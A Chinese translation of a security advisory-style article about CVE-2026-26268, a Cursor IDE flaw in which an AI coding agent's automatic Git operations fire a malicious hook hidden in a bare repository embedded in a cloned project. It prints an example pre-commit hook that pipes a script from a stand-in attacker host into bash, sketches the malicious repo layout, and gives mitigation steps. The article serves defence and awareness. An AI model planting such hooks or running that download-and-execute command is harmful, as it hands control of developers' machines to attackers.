結論先講,Cursor 使用者現在就請立刻升級到 2.5 以上版本。

在 2026 年 4 月 28 日,AI 程式開發工具「Cursor」公開了CVSS 9.9(接近滿分) 的致命漏洞。

你只要 git clone 一個惡意的儲存庫,什麼都不用操作,電腦就會被完全接管。

發生了什麼

這個被稱為 CVE-2026-26268 的漏洞,濫用了 Cursor「AI 代理可自動執行 Git 操作」這項便利功能。

被害流程

  1. 攻擊者建立一個「看起來正常」的 GitHub 儲存庫
  2. 你將該儲存庫 clone 下來
  3. Cursor 的 AI 代理自動執行 Git 操作
  4. 隱藏的 Git Hook 被觸發
  5. 攻擊者的程式在你的電腦上執行

傳統 IDE 只要使用者沒有明確執行命令,就不會發生任何事。

但 Cursor 是由 AI 自主運作

這個「便利性」徹底反過來害了使用者。

技術性的攻擊手法

這次攻擊結合了 Git 的兩個正規功能。

1. Git Hooks

Git Hooks 是會對特定 Git 事件(commit、checkout 等)自動執行的腳本。

# .git/hooks/pre-commit 的範例
#!/bin/bash
curl -s http://attacker.com/steal.sh | bash

2. Bare Repository(空託儲存庫)

這是一種不含工作目錄、只包含 Git 版本管理資料的儲存庫。它可以被嵌入到另一個儲存庫中

攻擊的實作

malicious-repo/
├── README.md(看起來正常)
├── src/(正常的程式碼)
└── .hidden-bare-repo/  ← 這裡放空託儲存庫
    └── hooks/
        └── pre-commit  ← 惡意腳本

當 Cursor 的 AI 代理分析儲存庫時,如果執行了 git checkout 等操作,這個 pre-commit hook 就會自動觸發

為什麼是 CVSS 9.9

這個漏洞之所以被評為最高等級,原因如下:

  • 攻擊複雜度低(只要讓使用者 clone 儲存庫)
  • 不需要權限(無需認證)
  • 不需要使用者操作(AI 會自己做)
  • 影響範圍完整(可執行任意程式碼)

「只要 git clone 就結束了」。

使用者沒有做任何壞事,只是 clone 了一個儲存庫。就這樣,電腦被接管了。

受影響的版本

  • Cursor 2.4 以前的所有版本

此漏洞已於 2026 年 2 月修補,並於 4 月 28 日公開細節。

現在立刻要做的事

1. 將 Cursor 升級

# 檢查版本
cursor --version

# 如果低於 2.5,請立刻更新

在 Cursor 2.5 中,已加入適當的授權控管,防止從沙箱環境寫入 .git 設定檔。

2. 不要 clone 不可信的儲存庫

即使在 GitHub 上看到「看起來很方便的工具」,也要注意星數很少、作者不明的儲存庫。

3. 檢查 .git/hooks

請確認你已 clone 的儲存庫中的 .git/hooks 目錄。

ls -la .git/hooks/
cat .git/hooks/pre-commit  # 檢查內容

4. 限制 AI 代理的自動執行

請考慮在 Cursor 設定中,停用 AI 代理自動執行 Git 操作的功能。

這是 AI 代理時代的「新脆弱性類別」

傳統的安全模型預設「使用者會明確操作」。

但 AI 代理卻會:

  • 自主判斷並行動
  • 未經使用者同意就執行命令
  • 有可能踩到攻擊者預先設下的觸發點

這個漏洞顯示,AI 代理越「便利」,反而越危險,是新時代的安全典範轉移。

Claude Code 使用者也不能置身事外

雖然這是 Cursor 特有的漏洞,但它也對採用相同設計理念的所有 AI 程式開發工具敲響警鐘。

只要 AI 代理能自主行動,「使用者未預期的操作」就永遠有風險。

使用 AI 程式開發工具時的心得

  • 絕對不要 clone 不可信的儲存庫
  • 謹慎使用 AI 自動執行功能
  • 定期確認安全更新
  • 定期檢查 .git 目錄內容

總結

  • CVE-2026-26268:Cursor 存在只要 git clone 就可能執行任意程式碼的漏洞
  • CVSS 9.9:幾乎是最高等級的嚴重性
  • 原因:AI 代理會自主執行 Git 操作
  • 對策:升級到 Cursor 2.5 以上

AI 代理的「便利」,同時也代表「攻擊面擴大」。

越方便的工具,越要注意資安。


如果這篇文章對你有幫助,請按讚並收藏!

問題:你對 AI 程式開發工具的安全性,會在意到什麼程度?歡迎留言告訴我。

參考連結

CVE-2026-26268: How an AI Coding Agent Can Run Exploits in Cursor IDE

Cursor AI Coding Agent Vulnerability Allow Attackers to Execute Code on Developer's Machine

Critical Cursor bug could turn routine Git into RCE | CSO Online

CVE-2026-26268 Detail - NVD


原文出處:https://qiita.com/emi_ndk/items/8e6607a09cb8ff86c298


精選技術文章翻譯,幫助開發者持續吸收新知。

共有 0 則留言


精選技術文章翻譯,幫助開發者持續吸收新知。
🏆 本月排行榜
🥇
站長阿川
📝11   💬8  
245
🥈
我愛JS
💬1  
5
🥉
Gigi
2
評分標準:發文×10 + 留言×3 + 獲讚×5 + 點讚×1 + 瀏覽數÷10
本數據每小時更新一次
📢 贊助商廣告 · 我要刊登